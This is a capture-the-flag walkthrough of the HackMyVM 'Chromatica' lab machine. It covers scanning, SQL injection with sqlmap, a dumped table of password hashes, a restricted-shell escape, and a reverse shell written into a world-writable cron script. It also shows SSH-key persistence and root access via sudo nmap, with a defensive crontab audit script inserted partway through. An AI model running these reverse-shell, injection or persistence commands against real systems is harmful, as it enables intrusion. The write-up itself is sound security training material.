Overview
Target name: Chromatica
Difficulty: easy
Machine URL: https://hackmyvm.eu/machines/machine.php?vm=Chromatica
Local environment
Hypervisor: VirtualBox
Target IP (Chromatica): 192.168.56.115
Pivot host IP (Windows 11): 192.168.56.1, 192.168.190.100
Attack box IP (Ubuntu 22.04): 192.168.190.30
Scanning
Start with nmap; port 5353 shows up.
nmap -p 1-65535 -T4 -A -v 192.168.56.115/32
HTTP
Directory enumeration with gobuster
gobuster dir -u http://192.168.56.115/ -w $HVV_PATH/8_dict/SecLists-master/Discovery/Web-Content/directory-list-2.3-big.txt -b 402-404 -t 10 -x php,zip,bak,jpg,txt,html
A new path turns up in /robots.txt.
SQL injection
Change the User-Agent to dev,
then visiting that path gives a search page.
Searching returns nothing useful, but throwing in a classic auth-bypass string shows the parameter is SQL-injectable.
Let sqlmap do the rest, but remember to set the User-Agent:
sqlmap -u http://192.168.56.115/dev-portal/search.php\?city\= --method GET --user-agent="dev" -D Chromatica --dump-all
+----+----------------------------------+-----------+-----------------------------+
| id | password                         | username  | description                 |
+----+----------------------------------+-----------+-----------------------------+
| 1  | 8d06f5ae0a469178b28bbd34d1da6ef3 | admin     | admin                       |
| 2  | 1ea6762d9b86b5676052d1ebd5f649d7 | dev       | developer account for taz   |
| 3  | 3dd0f70a06e2900693fc4b684484ac85 | user      | user account for testing    |
| 4  | f220c85e3ff19d043def2578888fb4e5 | dev-selim | developer account for selim |
| 5  | aaf7fb4d4bffb8c8002978a9c9c6ddc9 | intern    | intern                      |
+----+----------------------------------+-----------+-----------------------------+
Normally you would crack these, but my Kali box could not break them and the other wordlists were no better, so I paid cmd5 to make the problem go away.
❯ ssh dev@192.168.56.115
dev@192.168.56.115's password:
GREETINGS,
THIS ACCOUNT IS NOT A LOGIN ACCOUNT
IF YOU WANNA DO SOME MAINTENANCE ON THIS ACCOUNT YOU HAVE TO
EITHER CONTACT YOUR ADMIN
OR THINK OUTSIDE THE BOX
BE LAZY AND CONTACT YOUR ADMIN
OR MAYBE YOU SHOULD USE YOUR HEAD MORE heh,,
REGARDS
brightctf{ALM0ST_TH3R3_34897ffdf69}
Connection to 192.168.56.115 closed.
That is a fake flag (sigh).
Since we did successfully connect, is there a way to keep this connection?
First shrink the terminal window so the banner cannot be printed all at once,
then, right at that point, type !bash
Done.
The user.txt in that directory contains brightctf{ONE_OCKLOCK_8cfa57b4168}
Privilege escalation
Abusing the cron job
Check the crontab:
dev@Chromatica:/home$ cat /etc/crontab
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
A script runs every minute, and we have write access to it:
dev@Chromatica:/opt/scripts$ ls -alh
total 12K
drwxrwxrwx 2 root root 4.0K Apr 18 07:57 .
drwxr-xr-x 6 root root 4.0K Apr 24 14:05 ..
-rwxrwxrw- 1 analyst analyst 30 May 15 14:00 end_of_day.sh
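The finding above is a standard misconfiguration: a system crontab job executes a file that users other than its owner can edit. The following audit, added here as an example and not part of the original writeup, parses system-crontab lines, pulls out every absolute path the job runs, and reports the ones whose mode grants group or world write. The crontab text and the ls-style permission table are constructed to mirror the listing above; `SAMPLE_CRONTAB`, `SAMPLE_MODES` and all function names are my own.

```python
import os
import re
import stat

# Constructed sample modelled on the /etc/crontab listed above.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * analyst /bin/bash /opt/scripts/end_of_day.sh
"""
# Constructed ls-style permissions standing in for a real os.stat() call.
SAMPLE_MODES = {
    "/bin/bash": "-rwxr-xr-x",
    "/etc/cron.hourly": "drwxr-xr-x",
    "/opt/scripts/end_of_day.sh": "-rwxrwxrw-",
}

def mode_from_ls(text):
    """Turn an ls permission string such as -rwxrwxrw- into mode bits (0o776)."""
    return int("".join("0" if c == "-" else "1" for c in text[1:10]), 2)

def parse_system_crontab(text):
    """Yield (user, command) per job line; skip blanks, comments and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or re.match(r"^\w+=", line):
            continue
        fields = line.split(None, 6)  # min hour dom month dow user command
        if len(fields) == 7:
            yield fields[5], fields[6]

def loose_paths(command, get_mode):
    """Absolute paths in the command whose mode lets group or others write."""
    found = []
    for tok in re.findall(r"(?<![\w/])/[\w./-]+", command):
        try:
            mode = get_mode(tok)
        except (OSError, KeyError):
            continue  # path does not exist (or is not in the sample table)
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            found.append(tok)
    return found

def audit_crontab(text, get_mode=lambda p: os.stat(p).st_mode):
    """Return (user, path) for every job that executes a file others can edit."""
    return [(user, p) for user, cmd in parse_system_crontab(text)
            for p in loose_paths(cmd, get_mode)]

def demo():
    return audit_crontab(SAMPLE_CRONTAB, lambda p: mode_from_ls(SAMPLE_MODES[p]))
```

On a live host, `audit_crontab(open("/etc/crontab").read())` uses the real `os.stat`; the fix for any hit is to make the script owned by root (or the cron user) with mode 0755 or tighter.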
Nothing more to say: start a listener on the attack box and write the reverse shell into the script.
Listener:
rlwrap -cAr nc -lvvp 40001
Reverse shell line:
bash -c "bash -i >& /dev/tcp/192.168.56.1/40001 0>&1"
SSH persistence
Add the attack box's public key to authorized_keys:
analyst@Chromatica:~$ ssh-keygen
...
analyst@Chromatica:~$ cd .ssh
analyst@Chromatica:~/.ssh$ echo "ssh-rsa <PUBLIC_KEY_OMITTED> root@koishi-reverse" >> authorized_keys
Escalation via sudo -l
Check sudo rights with sudo -l:
analyst@Chromatica:~$ sudo -l
Matching Defaults entries for analyst on Chromatica:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User analyst may run the following commands on Chromatica:
(ALL : ALL) NOPASSWD: /usr/bin/nmap
Straight to GTFOBins
to find the shell-spawning entry for nmap.
It worked and gave a shell. My input was not echoed anywhere, whatever I tried, so I just typed cat /root/root.txt blind
and that finished the box.
brightctf{ALM0ST_TH3R3_34897ffdf69}